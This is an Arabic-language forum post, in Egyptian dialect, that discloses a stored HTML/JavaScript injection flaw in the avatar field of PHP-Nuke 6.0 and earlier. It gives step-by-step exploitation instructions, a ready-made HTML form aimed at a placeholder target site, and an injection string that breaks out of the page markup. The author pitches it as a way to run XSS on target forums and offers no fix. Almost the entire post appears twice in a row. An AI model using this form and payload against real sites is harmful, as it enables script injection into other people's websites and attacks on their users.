فيه ثغره في ال php nuke حبيت اقولكم عليها ..الثغره دي تتيح لك تنفيذ اكواد الهتمل و الجافا بدل مكان الصوره الشخصيه .......
انا عارف انكم اول ما تقروا السطر الاول اكيد اغلبكم حيشتمني باكثر الالفاظ اباحه - بس عادي انا متعود - و يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!! بس ؟؟؟!!! اما عبيط اوي !!!
لكن في اخر الموضوع حقولكم ممكن تعملوا بيها ايه .....
المهم ان الثغره كالتالي : ( ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره )
الاصدارات المصابه :
PHP Nuke versionh 6.0 و الاقل منها
الاستخدام :
تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلال مكان صورهم الشخصيه.
ملخص عام للثغره:
اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلال مجموعه من الصور الموجوده في المجلد هذا /images/forum/avatars ....
عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز .. و لكنها لا تقوم بوضع اي كود اي انه اذا استطاع اي يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق text عادي ..اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه !!!!
الاكسبلويت:
اولا عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه Your Account و منها الذهاب الى صفحه Your Info بعد ذلك عليك باظهار سورس كود الصفحه من خلال view source و البحث عن كلمه uid
لازم تلاقي حاجه زي كده :
<input type="hidden" name="uid" value="2111">
كده يبقى انت عرفت رقم الاي دي اللي هوه في المثال كان 2111 ...
عليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد html مع ملاحظه تغيير [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الى عنوان المجله الهدف ......:
<!-- START CODE --!>
<form name="Register"
action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">
<b>Code ('">[code]<b ')</b><input type="text"
name="user_avatar" size="30"
maxlength="30"><br><br>
<b>Username</b><input type="text" name="uname" size="30"
maxlength="255"><br><b>User ID:<input type="text"
name="uid"
size="30"><input type="hidden" name="op"
value="saveuser"><input
type="submit" value="Save Changes"></form>
<!-- END CODE --!>
و الان عليك تشغيل ملف الhtml هذا .. اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجب ن يبدأ بالعلامه :
">
و ممكن ينتهي بالعلامه
<b
حتى لا تجد اي مشاكل في الكود عند العرض ...ضع بعد كده اسم اليوزر و رقم الاي دي و بعدين submit سوف تجد نفسك في صفحه Your Account الخاصه بك ..و كده الكود تم تشغيله !!!!
مثال للي ممكن تكتبه مثلا :
"><h1>TESTING</h1><b
طبعا ده حيطبع الكلمه TESTING مكان صورتك الشخصيه ....!!
خلي بالك ان فيه مسافه بعد العلامه
"<b
خلي بالك منها والا سوف تجد بروكين كود ..
اقصى حد للكود اللي ممكن انك تشغله هو 30 كراكتر ....
اللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات xss او اي حاجه انت مش عارف تنفذها بسبب اغلاق كود الهتمل اياه =) لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟
الحل :
لسه و الله !!!!
و السلام عليكم و رحمه الله و بركاته...
انا عارف انكم اول ما تقروا السطر الاول اكيد اغلبكم حيشتمني باكثر الالفاظ اباحه - بس عادي انا متعود - و يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!! بس ؟؟؟!!! اما عبيط اوي !!!
لكن في اخر الموضوع حقولكم ممكن تعملوا بيها ايه .....
المهم ان الثغره كالتالي : ( ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره )
الاصدارات المصابه :
PHP Nuke versionh 6.0 و الاقل منها
الاستخدام :
تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلال مكان صورهم الشخصيه.
ملخص عام للثغره:
اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلال مجموعه من الصور الموجوده في المجلد هذا /images/forum/avatars ....
عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز .. و لكنها لا تقوم بوضع اي كود اي انه اذا استطاع اي يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق text عادي ..اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه !!!!
الاكسبلويت:
اولا عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه Your Account و منها الذهاب الى صفحه Your Info بعد ذلك عليك باظهار سورس كود الصفحه من خلال view source و البحث عن كلمه uid
لازم تلاقي حاجه زي كده :
<input type="hidden" name="uid" value="2111">
كده يبقى انت عرفت رقم الاي دي اللي هوه في المثال كان 2111 ...
عليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد html مع ملاحظه تغيير [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الى عنوان المجله الهدف ......:
<!-- START CODE --!>
<form name="Register"
action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">
<b>Code ('">[code]<b ')</b><input type="text"
name="user_avatar" size="30"
maxlength="30"><br><br>
<b>Username</b><input type="text" name="uname" size="30"
maxlength="255"><br><b>User ID:<input type="text"
name="uid"
size="30"><input type="hidden" name="op"
value="saveuser"><input
type="submit" value="Save Changes"></form>
<!-- END CODE --!>
و الان عليك تشغيل ملف الhtml هذا .. اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجب ن يبدأ بالعلامه :
">
و ممكن ينتهي بالعلامه
<b
حتى لا تجد اي مشاكل في الكود عند العرض ...ضع بعد كده اسم اليوزر و رقم الاي دي و بعدين submit سوف تجد نفسك في صفحه Your Account الخاصه بك ..و كده الكود تم تشغيله !!!!
مثال للي ممكن تكتبه مثلا :
"><h1>TESTING</h1><b
طبعا ده حيطبع الكلمه TESTING مكان صورتك الشخصيه ....!!
خلي بالك ان فيه مسافه بعد العلامه
"<b
خلي بالك منها والا سوف تجد بروكين كود ..
اقصى حد للكود اللي ممكن انك تشغله هو 30 كراكتر ....
اللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات xss او اي حاجه انت مش عارف تنفذها بسبب اغلاق كود الهتمل اياه =) لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟
الحل :
لسه و الله !!!!
و السلام عليكم و رحمه الله و بركاته...